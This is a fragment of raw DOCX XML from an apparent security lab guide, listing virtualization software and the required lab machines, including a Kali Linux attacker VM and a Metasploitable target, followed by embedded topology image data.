        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VMware Workstation Pro  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VMware Fusion Pro (for Mac),  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VMware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="172" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Hyper-V </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="61" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5768340" cy="218237"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="8845" name="Group 8845"/>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1587" name="Shape 11587"/>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289" name="Rectangle 289"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="18288" y="0"/>
                            <a:ext cx="1564985" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>What you need?</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="290" name="Rectangle 290"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1194816" y="0"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="Group 8845" o:spid="_x0000_s1157"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9IQQMAAMoJAAAOAAAAZHJzL2Uyb0RvYy54bWzEVttu2zAMfR+wfxD8vvqSmxMkKYZuLQYM&#10;a9F2H6DY8gWQJUNS4mRfP4qynPSyYu2ALgFsWiIp8pA89vJ833CyY0rXUqyC+CwKCBOZzGtRroKf&#10;95ef0oBoQ0VOuRRsFRyYDs7XHz8su3bBEllJnjNFwInQi65dBZUx7SIMdVaxhuoz2TIBm4VUDTXw&#10;qMowV7QD7w0Pkyiahp1UeatkxrSG1S9uM1ij/6JgmbkuCs0M4asAYjN4VXjd2Gu4XtJFqWhb1Vkf&#10;Bn1DFA2tBRw6uPpCDSVbVT9x1dSZkloW5iyTTSiLos4Y5gDZxNGjbK6U3LaYS7noynaACaB9hNOb&#10;3WY/djeK1PkqSNPxJCCCNlAlPJjgCgDUteUC9K5Ue9feqH6hdE82532hGnuHbMgeoT0M0LK9IRks&#10;TmbTdDSGCmSwl8RpMpo57LMKCvTELKu+vmwY+mNDG90QTNdCG+kjUvrfkLqraMuwANoi0CMVx5N0&#10;5qFCFeKWEBrUHIDSCw2Y/RGleJ5EIwfEs0jFs0kyxS4dEqaLbKvNFZOIOd1918Y1ce4lWnkp2wsv&#10;KhiFF4egpcba2VCtSLqTolUw2i4Su93IHbuXqGgeVQ6iPO5ycao1dIBvDtD1Gv7eor9TzQcAeDV/&#10;d+rQVODyrxU9ms4JBGGzXS97AREA+RRjLiwYtncpMFTBqcFRb2oD1MXrBg5PZlF0dAzebCO6yqNk&#10;DpxZwLi4ZQWMG46JXdCq3FxwRXbUEhT+bDsgNqBqVYqa88EqxqMfWF0m9t9b9crWjiH9DZaRs8z6&#10;Ax0HApNAXp4J4dTBCE+Wwgz2AvgbDzlJyIobmR+QFTBnGD5LGO8whUk69zN4C71NRckZsYuvmUIg&#10;ohTeUL4lIf+eduLJdDxPgRCRr+ZRMpn0CHu2a5WbQmKFVWDnCxH2E2kbqlexWHJhr0JeQjV9gZ/0&#10;idlv9kjGCbLjEV5SSfXrGt6zBZfQizCAKAWEfxPAcVBD4wXlhY0XlOEXEt9/LoTPWyOL2rIGlswV&#10;sH94x/rNIWr3ujmpHyy+qn7xfJzG0+cqOJmO4vF/q1/q03Dovm/98J0IHwzII/3Hjf0iOX3Geh8/&#10;wda/AQAA//8DAFBLAwQUAAYACAAAACEAA91c8t0AAAAEAQAADwAAAGRycy9kb3ducmV2LnhtbEyP&#10;QWvCQBCF7wX/wzKF3uommopNsxGRticpqIXS25gdk2B2NmTXJP77bnupl4HHe7z3TbYaTSN66lxt&#10;WUE8jUAQF1bXXCr4PLw9LkE4j6yxsUwKruRglU/uMky1HXhH/d6XIpSwS1FB5X2bSumKigy6qW2J&#10;g3eynUEfZFdK3eEQyk0jZ1G0kAZrDgsVtrSpqDjvL0bB+4DDeh6/9tvzaXP9Pjx9fG1jUurhfly/&#10;gPA0+v8w/OIHdMgD09FeWDvRKAiP+L8bvOdomYA4KpgnCcg8k7fw+Q8AAAD//wMAUEsBAi0AFAAG&#10;AAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQ&#10;SwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQ&#10;SwECLQAUAAYACAAAACEAa2v/SEEDAADKCQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54&#10;bWxQSwECLQAUAAYACAAAACEAA91c8t0AAAAEAQAADwAAAAAAAAAAAAAAAACbBQAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA8wAAAKUGAAAAAA==&#10;">
                <v:shape id="Shape 11587" o:spid="_x0000_s1158" style="position:absolute;top:192;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C5pMQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2sCMRC+F/ofwgi91axCVbZGkUpRvPkAPQ7JdHfZ&#10;zWRJ4rrtr28Ewdt8fM+ZL3vbiI58qBwrGA0zEMTamYoLBafj9/sMRIjIBhvHpOCXAiwXry9zzI27&#10;8Z66QyxECuGQo4IyxjaXMuiSLIaha4kT9+O8xZigL6TxeEvhtpHjLJtIixWnhhJb+ipJ14erVaDP&#10;nd/pa735O8XL5rLfHmst10q9DfrVJ4hIfXyKH+6tSfNHH7Mp3N9JN8jF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AuaTEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l5768340,r,175260l,175260,,e" fillcolor="#f2f2f2" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5768340,175260"/>
                </v:shape>
                <v:rect id="Rectangle 289" o:spid="_x0000_s1159" style="position:absolute;left:182;width:15650;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cn8cQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE7wv+h/AEb2uqB2mrUUR30eOuCurt0Tzb&#10;YvNSmmjr/vqNIHgcZuYbZrboTCXu1LjSsoLRMAJBnFldcq7gsP/+jEE4j6yxskwKHuRgMe99zDDV&#10;tuVfuu98LgKEXYoKCu/rVEqXFWTQDW1NHLyLbQz6IJtc6gbbADeVHEfRRBosOSwUWNOqoOy6uxkF&#10;m7henrb2r82rr/Pm+HNM1vvEKzXod8spCE+df4df7a1WMI4TeJ4JR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j3J/HEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>What you need?</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 290" o:spid="_x0000_s1160" style="position:absolute;left:11948;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YscEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1lQPYqtpEd1Fj7sqqLehGdti&#10;MylNtHV//eYgeHy872XWm1o8qHWVZQWTcQSCOLe64kLB8fD9OQfhPLLG2jIpeJKDLB18LDHRtuNf&#10;eux9IUIIuwQVlN43iZQuL8mgG9uGOHBX2xr0AbaF1C12IdzUchpFM2mw4tBQYkPrkvLb/m4UbOfN&#10;6ryzf11Rf122p59TvDnEXqnRsF8tQHjq/Vv8cu+0gmkc5ocz4QjI9B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UGLHBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="78" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Machines running Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Attacker)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, Windows 7/ XP/10, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.0.0, Windows Server 2016. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet access </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="56" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="56" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="41" w:line="234" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>The configurations/ ip addressing below listed is based on this topology. Make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>necessary changes as you work on.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="163" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="187"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5487033" cy="762632"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="9069" name="Group 9069"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5487033" cy="762632"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5487033" cy="762632"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9139" name="Picture 9139"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1465579" y="24156"/>
                            <a:ext cx="1228725" cy="739775"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="466" name="Picture 466"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId25"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="4374237" y="47799"/>
                            <a:ext cx="512445" cy="512445"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9142" name="Picture 9142"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="4256404" y="24156"/>
                            <a:ext cx="1231900" cy="736600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9140" name="Picture 9140"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId27"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="-4445" y="-4418"/>
                            <a:ext cx="1231900" cy="739775"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9141" name="Picture 9141"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2910204" y="24156"/>
                            <a:ext cx="1231900" cy="739775"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4218A2C9" id="Group 9069" o:spid="_x0000_s1026" style="width:432.05pt;height:60.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="54870,76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